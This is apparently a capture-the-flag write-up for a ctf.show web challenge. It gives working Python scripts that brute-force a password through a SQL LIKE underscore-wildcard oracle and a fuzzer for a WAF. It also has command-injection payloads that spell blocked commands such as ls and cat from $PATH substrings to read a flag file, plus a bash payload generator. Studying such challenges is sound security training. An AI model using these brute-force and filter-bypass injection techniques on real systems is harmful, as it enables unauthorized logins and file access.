# 莫负婵娟

Testing showed that `%` is blocked by the WAF but `_` still gets through. Since `_` is the single-character `LIKE` wildcard, a pattern of N underscores is accepted only when the password is exactly N characters long, which turns the login into a length oracle:

```python
import requests

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}

# '_' matches exactly one character, so i underscores are only accepted when
# the stored password has exactly i characters. Any response other than the
# generic error reveals the length.
for i in range(1, 50):
    payload = {'username': 'yu22x',
               'password': '_' * i}
    response = requests.post(url, headers=headers, data=payload)
    if response.text.find('wrong username or password') == -1:
        print(i)
        print(response.text.encode('utf-8'))
```

Result:

```
32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'
```

So the password is 32 characters long. Next, a script that recovers it one position at a time: the prefix found so far is kept fixed, one candidate character is appended, and every remaining position is padded with `_`:

```python
import requests
import string

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}

LENGTH = 32                                      # recovered by the length oracle above
charset = string.digits + string.ascii_letters   # digits, then a-z, then A-Z

password = ''
for i in range(LENGTH):
    for j in charset:
        # known prefix + one guess + '_' for every position still unknown
        exp = '_' * (LENGTH - i - 1)
        payload = {'username': 'yu22x',
                   'password': password + j + exp}
        response = requests.post(url, headers=headers, data=payload)
        if response.text.find('wrong username or password') == -1:
            password += j
            break
    else:
        raise SystemExit(f'no candidate matched at position {i}, got so far: {password!r}')

print(password)
```

Recovered password (note the mixed case: the script tries lowercase before uppercase, so the uppercase hits show that the comparison on the server is case-sensitive):

```
67815b0c009ee970fe4014abaa3Fa6A0
```
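To make the mechanics of the two scripts above concrete, here is an added example (my own code, not the challenge's or the author's) that models the vulnerable check locally with sqlite3. It assumes the backend compares the submitted password with SQL `LIKE`, which is why `_` behaves as a single-character wildcard; the account name and the recovered password are reused as constructed sample data. It also shows the caveat the mixed-case result hints at: against a case-insensitive `LIKE` (SQLite's default, toggled here with `PRAGMA case_sensitive_like` to stand in for the target's collation), the same brute force returns the lowercase variant, which then fails an exact-match login.

```python
import sqlite3
import string

# Constructed sample data: the account from the writeup and the password it recovered.
USERNAME = "yu22x"
SECRET = "67815b0c009ee970fe4014abaa3Fa6A0"
CHARSET = string.digits + string.ascii_letters  # same order as the writeup: digits, a-z, A-Z


def make_db(case_sensitive_like: bool) -> sqlite3.Connection:
    """In-memory users table. The PRAGMA decides whether LIKE ignores ASCII case;
    it stands in for the (unknown) collation of the real target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (USERNAME, SECRET))
    conn.execute("PRAGMA case_sensitive_like = %s" % ("ON" if case_sensitive_like else "OFF"))
    return conn


def vulnerable_login(conn, username, password) -> bool:
    # Assumed bug: the stored password is compared with LIKE, so the user-controlled
    # value is a pattern; '_' matches any single character, '%' any run of characters.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password LIKE ?",
        (username, password),
    ).fetchone()
    return row is not None


def safe_login(conn, username, password) -> bool:
    # Narrow fix: plain equality, so wildcard characters are just characters.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def recover_length(oracle, username, max_len=64):
    """Smallest n for which n underscores are accepted, i.e. the password length."""
    for n in range(1, max_len + 1):
        if oracle(username, "_" * n):
            return n
    return None


def recover_password(oracle, username, length, charset=CHARSET):
    """Position-by-position brute force: known prefix + one guess + '_' padding."""
    known = ""
    for pos in range(length):
        for c in charset:
            if oracle(username, known + c + "_" * (length - pos - 1)):
                known += c
                break
        else:
            return None  # nothing in the charset matched at this position
    return known


def attack(case_sensitive_like: bool):
    """Run the recovery against the vulnerable check and report (length, recovered,
    whether the recovered value passes the exact-match check)."""
    conn = make_db(case_sensitive_like)
    oracle = lambda u, p: vulnerable_login(conn, u, p)
    length = recover_length(oracle, USERNAME)
    recovered = recover_password(oracle, USERNAME, length)
    return length, recovered, safe_login(conn, USERNAME, recovered)


if __name__ == "__main__":
    for flag in (True, False):
        n, pw, ok = attack(flag)
        print(f"case_sensitive_like={flag}: length={n}, recovered={pw!r}, exact-match login={ok}")
```

Each request leaks one bit (match or no match), and 32 positions times a 62-character alphabet is at most a couple of thousand requests, so blocking `%` alone buys nothing. `safe_login` is only the narrow repair; the real one is to never compare a raw password in SQL at all and verify a salted hash instead.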

After logging in we land on an "internal network test platform" that takes an `ip` parameter. The first guess was SSRF, but trying directory traversal hit the WAF, so the next step is to fuzz every printable character one at a time in the `ip` parameter and record which ones do not trigger the WAF's `evil` response (this is a new instance, so the Cookie has to be updated):

```python
import string
import requests

url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"
headers = {
    'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
}

# Send each printable character on its own as the ip parameter; a character
# that does not provoke the WAF's 'evil' response is allowed and gets recorded.
with open('fuzz.txt', 'w') as file:
    for i in string.printable:
        payload = {'ip': i}
        response = requests.post(url, headers=headers, data=payload)
        if response.text.find('evil') == -1:
            file.write(i)
```

Characters that ended up in fuzz.txt, i.e. the ones the filter lets through (note the trailing space: space is allowed, while lowercase letters and `/` are not):

```
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ 
```

Since Linux command names are case-sensitive and only uppercase letters survive the filter, `ls` cannot be typed directly. The way round it is to pull the lowercase letters out of the `$PATH` environment variable with Bash substring expansion `${PATH:offset:length}`, which only needs `$`, `{`, `}`, `:` and digits, all of which are allowed (`;` is allowed too, so a second command can be chained after the IP address):

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FEgYkItwTlJpOXRK6FphZ%2F1.png?alt=media&#x26;token=0bae6346-414c-4b5e-953a-c011c1792630" alt=""><figcaption></figcaption></figure>

Slice single characters out of it:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FBL9rT4FdAzbTGnP9pZaU%2F1.png?alt=media&#x26;token=0d0835da-8240-43aa-aa66-6f8fd176f6cc" alt=""><figcaption></figcaption></figure>

List the directory (`${PATH:5:1}${PATH:2:1}` spells `ls` for a `$PATH` starting with `/usr/local/...`):

```
127.0.0.1;${PATH:5:1}${PATH:2:1}
```

A flag file is found:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FKiSuCPiFQ0s07JUaTu6U%2F1.png?alt=media&#x26;token=26059027-4a6d-4b95-beed-42de0249697a" alt=""><figcaption></figcaption></figure>

Read the file: `cat flag.php` or `nl flag.txt` both work. Because lowercase letters are blocked, the command name is again spelled from `$PATH` and the file name is written as the glob `????.???` (`?` and `.` are allowed), so it never has to appear literally:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2Ft2ArH1On66Ap3SzgKZQN%2F1.png?alt=media&#x26;token=e6ce53de-b3d4-4224-9fd2-31f204a5efe0" alt=""><figcaption></figcaption></figure>

```
127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???
```
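Working out the offsets from a screenshot is error-prone and they differ from box to box, so here is an added example (my own code, not from the writeup) that generates the `${PATH:offset:length}` payload automatically from the allowed charset recovered by the fuzz above, and expands it locally to check it before sending. It assumes bash (substring expansion is a bash feature) and uses a constructed `DEMO_PATH` in place of the target's real `$PATH`, which was only visible in the screenshots; the function names are my own.

```bash
#!/usr/bin/env bash
# Added example: spell WAF-blocked characters as ${PATH:i:1} expansions.
# Requires bash. The allowed charset is the one recovered by the fuzz script.

ALLOWED='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ '

# Constructed sample PATH standing in for the target's. The first six entries are
# the usual Debian default; /opt/tools is added only so that a 't' exists.
DEMO_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/tools'

# path_index CHAR [PATHSTR]: print the first offset of CHAR in PATHSTR (default: $PATH).
# Exit status 1 if the character never occurs, i.e. it cannot be spelled this way.
path_index() {
    local needle=$1 hay=${2:-$PATH} i
    for ((i = 0; i < ${#hay}; i++)); do
        if [ "${hay:i:1}" = "$needle" ]; then
            printf '%s\n' "$i"
            return 0
        fi
    done
    return 1
}

# path_encode WORD [PATHSTR]: rewrite WORD so every character the WAF blocks becomes
# a ${PATH:i:1} expansion; characters in ALLOWED pass through unchanged.
path_encode() {
    local word=$1 pathstr=${2:-$PATH} out='' c idx i
    for ((i = 0; i < ${#word}; i++)); do
        c=${word:i:1}
        case "$ALLOWED" in
            *"$c"*) out+=$c; continue ;;
        esac
        idx=$(path_index "$c" "$pathstr") || return 1
        out+="\${PATH:${idx}:1}"
    done
    printf '%s\n' "$out"
}

# path_decode EXPR [PATHSTR]: expand EXPR the way the target's shell would, with
# PATHSTR as $PATH, to verify a payload before sending it. Runs in a subshell so the
# caller's PATH is untouched; the expansion stays double-quoted, so nothing is
# executed or globbed locally.
path_decode() {
    local expr=$1 pathstr=${2:-$PATH}
    ( PATH=$pathstr; eval "printf '%s' \"$expr\"" )
}

# Assemble the injected ip values: 127.0.0.1;<encoded command>.
for cmd in 'ls' 'cat ????.???' 'nl ????.???'; do
    enc=$(path_encode "$cmd" "$DEMO_PATH")
    printf '%-14s -> 127.0.0.1;%s   (expands to: %s)\n' \
        "$cmd" "$enc" "$(path_decode "$enc" "$DEMO_PATH")"
done
```

With `DEMO_PATH`, `ls` and `nl` come out exactly as on the page (`${PATH:5:1}${PATH:2:1}` and `${PATH:14:1}${PATH:5:1}`), because the first six `$PATH` entries are the same; `t` lands at a different offset than the author's `92`, which is the point of generating rather than hard-coding. A character that does not occur anywhere in `$PATH` makes `path_encode` fail instead of emitting a broken payload; for those you would need another source string, such as a different environment variable.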
